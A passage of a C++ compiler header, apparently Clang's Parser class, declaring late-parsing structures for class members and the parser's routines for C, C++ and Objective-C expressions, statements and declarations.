/// which needs to be parsed at the end of the class declaration
/// after parsing all other member declarations.
struct LexedMethod : public LateParsedDeclaration {
Parser *Self;
Decl *D;
CachedTokens Toks;
/// \brief Whether this member function had an associated template
/// scope. When true, D is a template declaration.
/// otherwise, it is a member function declaration.
bool TemplateScope;
explicit LexedMethod(Parser* P, Decl *MD)
: Self(P), D(MD), TemplateScope(false) {}
void ParseLexedMethodDefs() override;
};
/// LateParsedDefaultArgument - Keeps track of a parameter that may
/// have a default argument that cannot be parsed yet because it
/// occurs within a member function declaration inside the class
/// (C++ [class.mem]p2).
struct LateParsedDefaultArgument {
explicit LateParsedDefaultArgument(Decl *P,
std::unique_ptr<CachedTokens> Toks = nullptr)
: Param(P), Toks(std::move(Toks)) { }
/// Param - The parameter declaration for this parameter.
Decl *Param;
/// Toks - The sequence of tokens that comprises the default
/// argument expression, not including the '=' or the terminating
/// ')' or ','. This will be NULL for parameters that have no
/// default argument.
std::unique_ptr<CachedTokens> Toks;
};
/// LateParsedMethodDeclaration - A method declaration inside a class that
/// contains at least one entity whose parsing needs to be delayed
/// until the class itself is completely-defined, such as a default
/// argument (C++ [class.mem]p2).
struct LateParsedMethodDeclaration : public LateParsedDeclaration {
explicit LateParsedMethodDeclaration(Parser *P, Decl *M)
: Self(P), Method(M), TemplateScope(false),
ExceptionSpecTokens(nullptr) {}
void ParseLexedMethodDeclarations() override;
Parser* Self;
/// Method - The method declaration.
Decl *Method;
/// \brief Whether this member function had an associated template
/// scope. When true, D is a template declaration.
/// othewise, it is a member function declaration.
bool TemplateScope;
/// DefaultArgs - Contains the parameters of the function and
/// their default arguments. At least one of the parameters will
/// have a default argument, but all of the parameters of the
/// method will be stored so that they can be reintroduced into
/// scope at the appropriate times.
SmallVector<LateParsedDefaultArgument, 8> DefaultArgs;
/// \brief The set of tokens that make up an exception-specification that
/// has not yet been parsed.
CachedTokens *ExceptionSpecTokens;
};
/// LateParsedMemberInitializer - An initializer for a non-static class data
/// member whose parsing must to be delayed until the class is completely
/// defined (C++11 [class.mem]p2).
struct LateParsedMemberInitializer : public LateParsedDeclaration {
LateParsedMemberInitializer(Parser *P, Decl *FD)
: Self(P), Field(FD) { }
void ParseLexedMemberInitializers() override;
Parser *Self;
/// Field - The field declaration.
Decl *Field;
/// CachedTokens - The sequence of tokens that comprises the initializer,
/// including any leading '='.
CachedTokens Toks;
};
/// LateParsedDeclarationsContainer - During parsing of a top (non-nested)
/// C++ class, its method declarations that contain parts that won't be
/// parsed until after the definition is completed (C++ [class.mem]p2),
/// the method declarations and possibly attached inline definitions
/// will be stored here with the tokens that will be parsed to create those
/// entities.
typedef SmallVector<LateParsedDeclaration*,2> LateParsedDeclarationsContainer;
/// \brief Representation of a class that has been parsed, including
/// any member function declarations or definitions that need to be
/// parsed after the corresponding top-level class is complete.
struct ParsingClass {
ParsingClass(Decl *TagOrTemplate, bool TopLevelClass, bool IsInterface)
: TopLevelClass(TopLevelClass), TemplateScope(false),
IsInterface(IsInterface), TagOrTemplate(TagOrTemplate) { }
/// \brief Whether this is a "top-level" class, meaning that it is
/// not nested within another class.
bool TopLevelClass : 1;
/// \brief Whether this class had an associated template
/// scope. When true, TagOrTemplate is a template declaration;
/// othewise, it is a tag declaration.
bool TemplateScope : 1;
/// \brief Whether this class is an __interface.
bool IsInterface : 1;
/// \brief The class or class template whose definition we are parsing.
Decl *TagOrTemplate;
/// LateParsedDeclarations - Method declarations, inline definitions and
/// nested classes that contain pieces whose parsing will be delayed until
/// the top-level class is fully defined.
LateParsedDeclarationsContainer LateParsedDeclarations;
};
/// \brief The stack of classes that is currently being
/// parsed. Nested and local classes will be pushed onto this stack
/// when they are parsed, and removed afterward.
std::stack<ParsingClass *> ClassStack;
ParsingClass &getCurrentClass() {
assert(!ClassStack.empty() && "No lexed method stacks!");
return *ClassStack.top();
}
/// \brief RAII object used to manage the parsing of a class definition.
class ParsingClassDefinition {
Parser &P;
bool Popped;
Sema::ParsingClassState State;
public:
ParsingClassDefinition(Parser &P, Decl *TagOrTemplate, bool TopLevelClass,
bool IsInterface)
: P(P), Popped(false),
State(P.PushParsingClass(TagOrTemplate, TopLevelClass, IsInterface)) {
}
/// \brief Pop this class of the stack.
void Pop() {
assert(!Popped && "Nested class has already been popped");
Popped = true;
P.PopParsingClass(State);
}
~ParsingClassDefinition() {
if (!Popped)
P.PopParsingClass(State);
}
};
/// \brief Contains information about any template-specific
/// information that has been parsed prior to parsing declaration
/// specifiers.
struct ParsedTemplateInfo {
ParsedTemplateInfo()
: Kind(NonTemplate), TemplateParams(nullptr), TemplateLoc() { }
ParsedTemplateInfo(TemplateParameterLists *TemplateParams,
bool isSpecialization,
bool lastParameterListWasEmpty = false)
: Kind(isSpecialization? ExplicitSpecialization : Template),
TemplateParams(TemplateParams),
LastParameterListWasEmpty(lastParameterListWasEmpty) { }
explicit ParsedTemplateInfo(SourceLocation ExternLoc,
SourceLocation TemplateLoc)
: Kind(ExplicitInstantiation), TemplateParams(nullptr),
ExternLoc(ExternLoc), TemplateLoc(TemplateLoc),
LastParameterListWasEmpty(false){ }
/// \brief The kind of template we are parsing.
enum {
/// \brief We are not parsing a template at all.
NonTemplate = 0,
/// \brief We are parsing a template declaration.
Template,
/// \brief We are parsing an explicit specialization.
ExplicitSpecialization,
/// \brief We are parsing an explicit instantiation.
ExplicitInstantiation
} Kind;
/// \brief The template parameter lists, for template declarations
/// and explicit specializations.
TemplateParameterLists *TemplateParams;
/// \brief The location of the 'extern' keyword, if any, for an explicit
/// instantiation
SourceLocation ExternLoc;
/// \brief The location of the 'template' keyword, for an explicit
/// instantiation.
SourceLocation TemplateLoc;
/// \brief Whether the last template parameter list was empty.
bool LastParameterListWasEmpty;
SourceRange getSourceRange() const LLVM_READONLY;
};
void LexTemplateFunctionForLateParsing(CachedTokens &Toks);
void ParseLateTemplatedFuncDef(LateParsedTemplate &LPT);
static void LateTemplateParserCallback(void *P, LateParsedTemplate &LPT);
static void LateTemplateParserCleanupCallback(void *P);
Sema::ParsingClassState
PushParsingClass(Decl *TagOrTemplate, bool TopLevelClass, bool IsInterface);
void DeallocateParsedClasses(ParsingClass *Class);
void PopParsingClass(Sema::ParsingClassState);
enum CachedInitKind {
CIK_DefaultArgument,
CIK_DefaultInitializer
};
NamedDecl *ParseCXXInlineMethodDef(AccessSpecifier AS,
AttributeList *AccessAttrs,
ParsingDeclarator &D,
const ParsedTemplateInfo &TemplateInfo,
const VirtSpecifiers& VS,
SourceLocation PureSpecLoc);
void ParseCXXNonStaticMemberInitializer(Decl *VarD);
void ParseLexedAttributes(ParsingClass &Class);
void ParseLexedAttributeList(LateParsedAttrList &LAs, Decl *D,
bool EnterScope, bool OnDefinition);
void ParseLexedAttribute(LateParsedAttribute &LA,
bool EnterScope, bool OnDefinition);
void ParseLexedMethodDeclarations(ParsingClass &Class);
void ParseLexedMethodDeclaration(LateParsedMethodDeclaration &LM);
void ParseLexedMethodDefs(ParsingClass &Class);
void ParseLexedMethodDef(LexedMethod &LM);
void ParseLexedMemberInitializers(ParsingClass &Class);
void ParseLexedMemberInitializer(LateParsedMemberInitializer &MI);
void ParseLexedObjCMethodDefs(LexedMethod &LM, bool parseMethod);
bool ConsumeAndStoreFunctionPrologue(CachedTokens &Toks);
bool ConsumeAndStoreInitializer(CachedTokens &Toks, CachedInitKind CIK);
bool ConsumeAndStoreConditional(CachedTokens &Toks);
bool ConsumeAndStoreUntil(tok::TokenKind T1,
CachedTokens &Toks,
bool StopAtSemi = true,
bool ConsumeFinalToken = true) {
return ConsumeAndStoreUntil(T1, T1, Toks, StopAtSemi, ConsumeFinalToken);
}
bool ConsumeAndStoreUntil(tok::TokenKind T1, tok::TokenKind T2,
CachedTokens &Toks,
bool StopAtSemi = true,
bool ConsumeFinalToken = true);
//===--------------------------------------------------------------------===//
// C99 6.9: External Definitions.
struct ParsedAttributesWithRange : ParsedAttributes {
ParsedAttributesWithRange(AttributeFactory &factory)
: ParsedAttributes(factory) {}
void clear() {
ParsedAttributes::clear();
Range = SourceRange();
}
SourceRange Range;
};
DeclGroupPtrTy ParseExternalDeclaration(ParsedAttributesWithRange &attrs,
ParsingDeclSpec *DS = nullptr);
bool isDeclarationAfterDeclarator();
bool isStartOfFunctionDefinition(const ParsingDeclarator &Declarator);
DeclGroupPtrTy ParseDeclarationOrFunctionDefinition(
ParsedAttributesWithRange &attrs,
ParsingDeclSpec *DS = nullptr,
AccessSpecifier AS = AS_none);
DeclGroupPtrTy ParseDeclOrFunctionDefInternal(ParsedAttributesWithRange &attrs,
ParsingDeclSpec &DS,
AccessSpecifier AS);
void SkipFunctionBody();
Decl *ParseFunctionDefinition(ParsingDeclarator &D,
const ParsedTemplateInfo &TemplateInfo = ParsedTemplateInfo(),
LateParsedAttrList *LateParsedAttrs = nullptr);
void ParseKNRParamDeclarations(Declarator &D);
// EndLoc, if non-NULL, is filled with the location of the last token of
// the simple-asm.
ExprResult ParseSimpleAsm(SourceLocation *EndLoc = nullptr);
ExprResult ParseAsmStringLiteral();
// Objective-C External Declarations
void MaybeSkipAttributes(tok::ObjCKeywordKind Kind);
DeclGroupPtrTy ParseObjCAtDirectives();
DeclGroupPtrTy ParseObjCAtClassDeclaration(SourceLocation atLoc);
Decl *ParseObjCAtInterfaceDeclaration(SourceLocation AtLoc,
ParsedAttributes &prefixAttrs);
class ObjCTypeParamListScope;
ObjCTypeParamList *parseObjCTypeParamList();
ObjCTypeParamList *parseObjCTypeParamListOrProtocolRefs(
ObjCTypeParamListScope &Scope, SourceLocation &lAngleLoc,
SmallVectorImpl<IdentifierLocPair> &protocolIdents,
SourceLocation &rAngleLoc, bool mayBeProtocolList = true);
void HelperActionsForIvarDeclarations(Decl *interfaceDecl, SourceLocation atLoc,
BalancedDelimiterTracker &T,
SmallVectorImpl<Decl *> &AllIvarDecls,
bool RBraceMissing);
void ParseObjCClassInstanceVariables(Decl *interfaceDecl,
tok::ObjCKeywordKind visibility,
SourceLocation atLoc);
bool ParseObjCProtocolReferences(SmallVectorImpl<Decl *> &P,
SmallVectorImpl<SourceLocation> &PLocs,
bool WarnOnDeclarations,
bool ForObjCContainer,
SourceLocation &LAngleLoc,
SourceLocation &EndProtoLoc,
bool consumeLastToken);
/// Parse the first angle-bracket-delimited clause for an
/// Objective-C object or object pointer type, which may be either
/// type arguments or protocol qualifiers.
void parseObjCTypeArgsOrProtocolQualifiers(
ParsedType baseType,
SourceLocation &typeArgsLAngleLoc,
SmallVectorImpl<ParsedType> &typeArgs,
SourceLocation &typeArgsRAngleLoc,
SourceLocation &protocolLAngleLoc,
SmallVectorImpl<Decl *> &protocols,
SmallVectorImpl<SourceLocation> &protocolLocs,
SourceLocation &protocolRAngleLoc,
bool consumeLastToken,
bool warnOnIncompleteProtocols);
/// Parse either Objective-C type arguments or protocol qualifiers; if the
/// former, also parse protocol qualifiers afterward.
void parseObjCTypeArgsAndProtocolQualifiers(
ParsedType baseType,
SourceLocation &typeArgsLAngleLoc,
SmallVectorImpl<ParsedType> &typeArgs,
SourceLocation &typeArgsRAngleLoc,
SourceLocation &protocolLAngleLoc,
SmallVectorImpl<Decl *> &protocols,
SmallVectorImpl<SourceLocation> &protocolLocs,
SourceLocation &protocolRAngleLoc,
bool consumeLastToken);
/// Parse a protocol qualifier type such as '<NSCopying>', which is
/// an anachronistic way of writing 'id<NSCopying>'.
TypeResult parseObjCProtocolQualifierType(SourceLocation &rAngleLoc);
/// Parse Objective-C type arguments and protocol qualifiers, extending the
/// current type with the parsed result.
TypeResult parseObjCTypeArgsAndProtocolQualifiers(SourceLocation loc,
ParsedType type,
bool consumeLastToken,
SourceLocation &endLoc);
void ParseObjCInterfaceDeclList(tok::ObjCKeywordKind contextKey,
Decl *CDecl);
DeclGroupPtrTy ParseObjCAtProtocolDeclaration(SourceLocation atLoc,
ParsedAttributes &prefixAttrs);
struct ObjCImplParsingDataRAII {
Parser &P;
Decl *Dcl;
bool HasCFunction;
typedef SmallVector<LexedMethod*, 8> LateParsedObjCMethodContainer;
LateParsedObjCMethodContainer LateParsedObjCMethods;
ObjCImplParsingDataRAII(Parser &parser, Decl *D)
: P(parser), Dcl(D), HasCFunction(false) {
P.CurParsedObjCImpl = this;
Finished = false;
}
~ObjCImplParsingDataRAII();
void finish(SourceRange AtEnd);
bool isFinished() const { return Finished; }
private:
bool Finished;
};
ObjCImplParsingDataRAII *CurParsedObjCImpl;
void StashAwayMethodOrFunctionBodyTokens(Decl *MDecl);
DeclGroupPtrTy ParseObjCAtImplementationDeclaration(SourceLocation AtLoc);
DeclGroupPtrTy ParseObjCAtEndDeclaration(SourceRange atEnd);
Decl *ParseObjCAtAliasDeclaration(SourceLocation atLoc);
Decl *ParseObjCPropertySynthesize(SourceLocation atLoc);
Decl *ParseObjCPropertyDynamic(SourceLocation atLoc);
IdentifierInfo *ParseObjCSelectorPiece(SourceLocation &MethodLocation);
// Definitions for Objective-c context sensitive keywords recognition.
enum ObjCTypeQual {
objc_in=0, objc_out, objc_inout, objc_oneway, objc_bycopy, objc_byref,
objc_nonnull, objc_nullable, objc_null_unspecified,
objc_NumQuals
};
IdentifierInfo *ObjCTypeQuals[objc_NumQuals];
bool isTokIdentifier_in() const;
ParsedType ParseObjCTypeName(ObjCDeclSpec &DS, Declarator::TheContext Ctx,
ParsedAttributes *ParamAttrs);
void ParseObjCMethodRequirement();
Decl *ParseObjCMethodPrototype(
tok::ObjCKeywordKind MethodImplKind = tok::objc_not_keyword,
bool MethodDefinition = true);
Decl *ParseObjCMethodDecl(SourceLocation mLoc, tok::TokenKind mType,
tok::ObjCKeywordKind MethodImplKind = tok::objc_not_keyword,
bool MethodDefinition=true);
void ParseObjCPropertyAttribute(ObjCDeclSpec &DS);
Decl *ParseObjCMethodDefinition();
public:
//===--------------------------------------------------------------------===//
// C99 6.5: Expressions.
/// TypeCastState - State whether an expression is or may be a type cast.
enum TypeCastState {
NotTypeCast = 0,
MaybeTypeCast,
IsTypeCast
};
ExprResult ParseExpression(TypeCastState isTypeCast = NotTypeCast);
ExprResult ParseConstantExpression(TypeCastState isTypeCast = NotTypeCast);
ExprResult ParseConstraintExpression();
// Expr that doesn't include commas.
ExprResult ParseAssignmentExpression(TypeCastState isTypeCast = NotTypeCast);
ExprResult ParseMSAsmIdentifier(llvm::SmallVectorImpl<Token> &LineToks,
unsigned &NumLineToksConsumed,
void *Info,
bool IsUnevaluated);
private:
ExprResult ParseExpressionWithLeadingAt(SourceLocation AtLoc);
ExprResult ParseExpressionWithLeadingExtension(SourceLocation ExtLoc);
ExprResult ParseRHSOfBinaryExpression(ExprResult LHS,
prec::Level MinPrec);
ExprResult ParseCastExpression(bool isUnaryExpression,
bool isAddressOfOperand,
bool &NotCastExpr,
TypeCastState isTypeCast);
ExprResult ParseCastExpression(bool isUnaryExpression,
bool isAddressOfOperand = false,
TypeCastState isTypeCast = NotTypeCast);
/// Returns true if the next token cannot start an expression.
bool isNotExpressionStart();
/// Returns true if the next token would start a postfix-expression
/// suffix.
bool isPostfixExpressionSuffixStart() {
tok::TokenKind K = Tok.getKind();
return (K == tok::l_square || K == tok::l_paren ||
K == tok::period || K == tok::arrow ||
K == tok::plusplus || K == tok::minusminus);
}
ExprResult ParsePostfixExpressionSuffix(ExprResult LHS);
ExprResult ParseUnaryExprOrTypeTraitExpression();
ExprResult ParseBuiltinPrimaryExpression();
ExprResult ParseExprAfterUnaryExprOrTypeTrait(const Token &OpTok,
bool &isCastExpr,
ParsedType &CastTy,
SourceRange &CastRange);
typedef SmallVector<Expr*, 20> ExprListTy;
typedef SmallVector<SourceLocation, 20> CommaLocsTy;
/// ParseExpressionList - Used for C/C++ (argument-)expression-list.
bool ParseExpressionList(SmallVectorImpl<Expr *> &Exprs,
SmallVectorImpl<SourceLocation> &CommaLocs,
std::function<void()> Completer = nullptr);
/// ParseSimpleExpressionList - A simple comma-separated list of expressions,
/// used for misc language extensions.
bool ParseSimpleExpressionList(SmallVectorImpl<Expr*> &Exprs,
SmallVectorImpl<SourceLocation> &CommaLocs);
/// ParenParseOption - Control what ParseParenExpression will parse.
enum ParenParseOption {
SimpleExpr, // Only parse '(' expression ')'
CompoundStmt, // Also allow '(' compound-statement ')'
CompoundLiteral, // Also allow '(' type-name ')' '{' ... '}'
CastExpr // Also allow '(' type-name ')' <anything>
};
ExprResult ParseParenExpression(ParenParseOption &ExprType,
bool stopIfCastExpr,
bool isTypeCast,
ParsedType &CastTy,
SourceLocation &RParenLoc);
ExprResult ParseCXXAmbiguousParenExpression(
ParenParseOption &ExprType, ParsedType &CastTy,
BalancedDelimiterTracker &Tracker, ColonProtectionRAIIObject &ColonProt);
ExprResult ParseCompoundLiteralExpression(ParsedType Ty,
SourceLocation LParenLoc,
SourceLocation RParenLoc);
ExprResult ParseStringLiteralExpression(bool AllowUserDefinedLiteral = false);
ExprResult ParseGenericSelectionExpression();
ExprResult ParseObjCBoolLiteral();
ExprResult ParseFoldExpression(ExprResult LHS, BalancedDelimiterTracker &T);
//===--------------------------------------------------------------------===//
// C++ Expressions
ExprResult tryParseCXXIdExpression(CXXScopeSpec &SS, bool isAddressOfOperand,
Token &Replacement);
ExprResult ParseCXXIdExpression(bool isAddressOfOperand = false);
bool areTokensAdjacent(const Token &A, const Token &B);
void CheckForTemplateAndDigraph(Token &Next, ParsedType ObjectTypePtr,
bool EnteringContext, IdentifierInfo &II,
CXXScopeSpec &SS);
bool ParseOptionalCXXScopeSpecifier(CXXScopeSpec &SS,
ParsedType ObjectType,
bool EnteringContext,
bool *MayBePseudoDestructor = nullptr,
bool IsTypename = false,
IdentifierInfo **LastII = nullptr);
//===--------------------------------------------------------------------===//
// C++0x 5.1.2: Lambda expressions
// [...] () -> type {...}
ExprResult ParseLambdaExpression();
ExprResult TryParseLambdaExpression();
Optional<unsigned> ParseLambdaIntroducer(LambdaIntroducer &Intro,
bool *SkippedInits = nullptr);
bool TryParseLambdaIntroducer(LambdaIntroducer &Intro);
ExprResult ParseLambdaExpressionAfterIntroducer(
LambdaIntroducer &Intro);
//===--------------------------------------------------------------------===//
// C++ 5.2p1: C++ Casts
ExprResult ParseCXXCasts();
//===--------------------------------------------------------------------===//
// C++ 5.2p1: C++ Type Identification
ExprResult ParseCXXTypeid();
//===--------------------------------------------------------------------===//
// C++ : Microsoft __uuidof Expression
ExprResult ParseCXXUuidof();
//===--------------------------------------------------------------------===//
// C++ 5.2.4: C++ Pseudo-Destructor Expressions
ExprResult ParseCXXPseudoDestructor(Expr *Base, SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
ParsedType ObjectType);
//===--------------------------------------------------------------------===//
// C++ 9.3.2: C++ 'this' pointer
ExprResult ParseCXXThis();
//===--------------------------------------------------------------------===//
// C++ 15: C++ Throw Expression
ExprResult ParseThrowExpression();
ExceptionSpecificationType tryParseExceptionSpecification(
bool Delayed,
SourceRange &SpecificationRange,
SmallVectorImpl<ParsedType> &DynamicExceptions,
SmallVectorImpl<SourceRange> &DynamicExceptionRanges,
ExprResult &NoexceptExpr,
CachedTokens *&ExceptionSpecTokens);
// EndLoc is filled with the location of the last token of the specification.
ExceptionSpecificationType ParseDynamicExceptionSpecification(
SourceRange &SpecificationRange,
SmallVectorImpl<ParsedType> &Exceptions,
SmallVectorImpl<SourceRange> &Ranges);
//===--------------------------------------------------------------------===//
// C++0x 8: Function declaration trailing-return-type
TypeResult ParseTrailingReturnType(SourceRange &Range);
//===--------------------------------------------------------------------===//
// C++ 2.13.5: C++ Boolean Literals
ExprResult ParseCXXBoolLiteral();
//===--------------------------------------------------------------------===//
// C++ 5.2.3: Explicit type conversion (functional notation)
ExprResult ParseCXXTypeConstructExpression(const DeclSpec &DS);
/// ParseCXXSimpleTypeSpecifier - [C++ 7.1.5.2] Simple type specifiers.
/// This should only be called when the current token is known to be part of
/// simple-type-specifier.
void ParseCXXSimpleTypeSpecifier(DeclSpec &DS);
bool ParseCXXTypeSpecifierSeq(DeclSpec &DS);
//===--------------------------------------------------------------------===//
// C++ 5.3.4 and 5.3.5: C++ new and delete
bool ParseExpressionListOrTypeId(SmallVectorImpl<Expr*> &Exprs,
Declarator &D);
void ParseDirectNewDeclarator(Declarator &D);
ExprResult ParseCXXNewExpression(bool UseGlobal, SourceLocation Start);
ExprResult ParseCXXDeleteExpression(bool UseGlobal,
SourceLocation Start);
//===--------------------------------------------------------------------===//
// C++ if/switch/while condition expression.
Sema::ConditionResult ParseCXXCondition(StmtResult *InitStmt,
SourceLocation Loc,
Sema::ConditionKind CK);
//===--------------------------------------------------------------------===//
// C++ Coroutines
ExprResult ParseCoyieldExpression();
//===--------------------------------------------------------------------===//
// C99 6.7.8: Initialization.
/// ParseInitializer
/// initializer: [C99 6.7.8]
/// assignment-expression
/// '{' ...
ExprResult ParseInitializer() {
if (Tok.isNot(tok::l_brace))
return ParseAssignmentExpression();
return ParseBraceInitializer();
}
bool MayBeDesignationStart();
ExprResult ParseBraceInitializer();
ExprResult ParseInitializerWithPotentialDesignator();
//===--------------------------------------------------------------------===//
// clang Expressions
ExprResult ParseBlockLiteralExpression(); // ^{...}
//===--------------------------------------------------------------------===//
// Objective-C Expressions
ExprResult ParseObjCAtExpression(SourceLocation AtLocation);
ExprResult ParseObjCStringLiteral(SourceLocation AtLoc);
ExprResult ParseObjCCharacterLiteral(SourceLocation AtLoc);
ExprResult ParseObjCNumericLiteral(SourceLocation AtLoc);
ExprResult ParseObjCBooleanLiteral(SourceLocation AtLoc, bool ArgValue);
ExprResult ParseObjCArrayLiteral(SourceLocation AtLoc);
ExprResult ParseObjCDictionaryLiteral(SourceLocation AtLoc);
ExprResult ParseObjCBoxedExpr(SourceLocation AtLoc);
ExprResult ParseObjCEncodeExpression(SourceLocation AtLoc);
ExprResult ParseObjCSelectorExpression(SourceLocation AtLoc);
ExprResult ParseObjCProtocolExpression(SourceLocation AtLoc);
bool isSimpleObjCMessageExpression();
ExprResult ParseObjCMessageExpression();
ExprResult ParseObjCMessageExpressionBody(SourceLocation LBracloc,
SourceLocation SuperLoc,
ParsedType ReceiverType,
Expr *ReceiverExpr);
ExprResult ParseAssignmentExprWithObjCMessageExprStart(
SourceLocation LBracloc, SourceLocation SuperLoc,
ParsedType ReceiverType, Expr *ReceiverExpr);
bool ParseObjCXXMessageReceiver(bool &IsExpr, void *&TypeOrExpr);
//===--------------------------------------------------------------------===//
// C99 6.8: Statements and Blocks.
/// A SmallVector of statements, with stack size 32 (as that is the only one
/// used.)
typedef SmallVector<Stmt*, 32> StmtVector;
/// A SmallVector of expressions, with stack size 12 (the maximum used.)
typedef SmallVector<Expr*, 12> ExprVector;
/// A SmallVector of types.
typedef SmallVector<ParsedType, 12> TypeVector;
StmtResult ParseStatement(SourceLocation *TrailingElseLoc = nullptr,
bool AllowOpenMPStandalone = false);
enum AllowedContsructsKind {
/// \brief Allow any declarations, statements, OpenMP directives.
ACK_Any,
/// \brief Allow only statements and non-standalone OpenMP directives.
ACK_StatementsOpenMPNonStandalone,
/// \brief Allow statements and all executable OpenMP directives
ACK_StatementsOpenMPAnyExecutable
};
StmtResult
ParseStatementOrDeclaration(StmtVector &Stmts, AllowedContsructsKind Allowed,
SourceLocation *TrailingElseLoc = nullptr);
StmtResult ParseStatementOrDeclarationAfterAttributes(
StmtVector &Stmts,
AllowedContsructsKind Allowed,
SourceLocation *TrailingElseLoc,
ParsedAttributesWithRange &Attrs);
StmtResult ParseExprStatement();
StmtResult ParseLabeledStatement(ParsedAttributesWithRange &attrs);
StmtResult ParseCaseStatement(bool MissingCase = false,
ExprResult Expr = ExprResult());
StmtResult ParseDefaultStatement();
StmtResult ParseCompoundStatement(bool isStmtExpr = false);
StmtResult ParseCompoundStatement(bool isStmtExpr,
unsigned ScopeFlags);
void ParseCompoundStatementLeadingPragmas();
StmtResult ParseCompoundStatementBody(bool isStmtExpr = false);
bool ParseParenExprOrCondition(StmtResult *InitStmt,
Sema::ConditionResult &CondResult,
SourceLocation Loc,
Sema::ConditionKind CK);
StmtResult ParseIfStatement(SourceLocation *TrailingElseLoc);
StmtResult ParseSwitchStatement(SourceLocation *TrailingElseLoc);
StmtResult ParseWhileStatement(SourceLocation *TrailingElseLoc);
StmtResult ParseDoStatement();
StmtResult ParseForStatement(SourceLocation *TrailingElseLoc);
StmtResult ParseGotoStatement();
StmtResult ParseContinueStatement();
StmtResult ParseBreakStatement();
StmtResult ParseReturnStatement();
StmtResult ParseAsmStatement(bool &msAsm);
StmtResult ParseMicrosoftAsmStatement(SourceLocation AsmLoc);
StmtResult ParsePragmaLoopHint(StmtVector &Stmts,
AllowedContsructsKind Allowed,
SourceLocation *TrailingElseLoc,
ParsedAttributesWithRange &Attrs);
/// \brief Describes the behavior that should be taken for an __if_exists
/// block.
enum IfExistsBehavior {
/// \brief Parse the block; this code is always used.
IEB_Parse,
/// \brief Skip the block entirely; this code is never used.
IEB_Skip,
/// \brief Parse the block as a dependent block, which may be used in
/// some template instantiations but not others.
IEB_Dependent
};
/// \brief Describes the condition of a Microsoft __if_exists or
/// __if_not_exists block.
struct IfExistsCondition {
/// \brief The location of the initial keyword.
SourceLocation KeywordLoc;
/// \brief Whether this is an __if_exists block (rather than an
/// __if_not_exists block).
bool IsIfExists;
/// \brief Nested-name-specifier preceding the name.
CXXScopeSpec SS;
/// \brief The name we're looking for.
UnqualifiedId Name;
/// \brief The behavior of this __if_exists or __if_not_exists block
/// should.
IfExistsBehavior Behavior;
};
bool ParseMicrosoftIfExistsCondition(IfExistsCondition& Result);
void ParseMicrosoftIfExistsStatement(StmtVector &Stmts);
void ParseMicrosoftIfExistsExternalDeclaration();
void ParseMicrosoftIfExistsClassDeclaration(DeclSpec::TST TagType,
AccessSpecifier& CurAS);
bool ParseMicrosoftIfExistsBraceInitializer(ExprVector &InitExprs,
bool &InitExprsOk);
bool ParseAsmOperandsOpt(SmallVectorImpl<IdentifierInfo *> &Names,
SmallVectorImpl<Expr *> &Constraints,
SmallVectorImpl<Expr *> &Exprs);
//===--------------------------------------------------------------------===//
// C++ 6: Statements and Blocks
StmtResult ParseCXXTryBlock();
StmtResult ParseCXXTryBlockCommon(SourceLocation TryLoc, bool FnTry = false);
StmtResult ParseCXXCatchBlock(bool FnCatch = false);
//===--------------------------------------------------------------------===//
// MS: SEH Statements and Blocks
StmtResult ParseSEHTryBlock();
StmtResult ParseSEHExceptBlock(SourceLocation Loc);
StmtResult ParseSEHFinallyBlock(SourceLocation Loc);
StmtResult ParseSEHLeaveStatement();
//===--------------------------------------------------------------------===//
// Objective-C Statements
StmtResult ParseObjCAtStatement(SourceLocation atLoc);
StmtResult ParseObjCTryStmt(SourceLocation atLoc);
StmtResult ParseObjCThrowStmt(SourceLocation atLoc);
StmtResult ParseObjCSynchronizedStmt(SourceLocation atLoc);
StmtResult ParseObjCAutoreleasePoolStmt(SourceLocation atLoc);
//===--------------------------------------------------------------------===//
// C99 6.7: Declarations.
/// A context for parsing declaration specifiers. TODO: flesh this
/// out, there are other significant restrictions on specifiers than
/// would be best implemented in the parser.
enum DeclSpecContext {
DSC_normal, // normal context
DSC_class, // class context, enables 'friend'
DSC_type_specifier, // C++ type-specifier-seq or C specifier-qualifier-list
DSC_trailing, // C++11 trailing-type-specifier in a trailing return type
DSC_alias_declaration, // C++11 type-specifier-seq in an alias-declaration
DSC_top_level, // top-level/namespace declaration context
DSC_template_type_arg, // template type argument context
DSC_objc_method_result, // ObjC method result context, enables 'instancetype'
DSC_condition // condition declaration context
};
/// Is this a context in which we are parsing just a type-specifier (or
/// trailing-type-specifier)?
static bool isTypeSpecifier(DeclSpecContext DSC) {
switch (DSC) {
case DSC_normal:
case DSC_class:
case DSC_top_level:
case DSC_objc_method_result:
case DSC_condition:
return false;
case DSC_template_type_arg:
case DSC_type_specifier:
case DSC_trailing:
case DSC_alias_declaration:
return true;
}
llvm_unreachable("Missing DeclSpecContext case");
}
/// Information on a C++0x for-range-initializer found while parsing a
/// declaration which turns out to be a for-range-declaration.
struct ForRangeInit {
SourceLocation ColonLoc;
ExprResult RangeExpr;
bool ParsedForRangeDecl() { return !ColonLoc.isInvalid(); }
};
DeclGroupPtrTy ParseDeclaration(unsigned Context, SourceLocation &DeclEnd,
ParsedAttributesWithRange &attrs);
DeclGroupPtrTy ParseSimpleDeclaration(unsigned Context,
SourceLocation &DeclEnd,
ParsedAttributesWithRange &attrs,
bool RequireSemi,
ForRangeInit *FRI = nullptr);
bool MightBeDeclarator(unsigned Context);
DeclGroupPtrTy ParseDeclGroup(ParsingDeclSpec &DS, unsigned Context,
SourceLocation *DeclEnd = nullptr,
ForRangeInit *FRI = nullptr);
Decl *ParseDeclarationAfterDeclarator(Declarator &D,
const ParsedTemplateInfo &TemplateInfo = ParsedTemplateInfo());
bool ParseAsmAttributesAfterDeclarator(Declarator &D);
Decl *ParseDeclarationAfterDeclaratorAndAttributes(
Declarator &D,
const ParsedTemplateInfo &TemplateInfo = ParsedTemplateInfo(),
ForRangeInit *FRI = nullptr);
Decl *ParseFunctionStatementBody(Decl *Decl, ParseScope &BodyScope);
Decl *ParseFunctionTryBlock(Decl *Decl, ParseScope &BodyScope);
/// \brief When in code-completion, skip parsing of the function/method body
/// unless the body contains the code-completion point.
///
/// \returns true if the function body was skipped.
bool trySkippingFunctionBody();
bool ParseImplicitInt(DeclSpec &DS, CXXScopeSpec *SS,
const ParsedTemplateInfo &TemplateInfo,
AccessSpecifier AS, DeclSpecContext DSC,
ParsedAttributesWithRange &Attrs);
DeclSpecContext getDeclSpecContextFromDeclaratorContext(unsigned Context);
void ParseDeclarationSpecifiers(DeclSpec &DS,
const ParsedTemplateInfo &TemplateInfo = ParsedTemplateInfo(),
AccessSpecifier AS = AS_none,
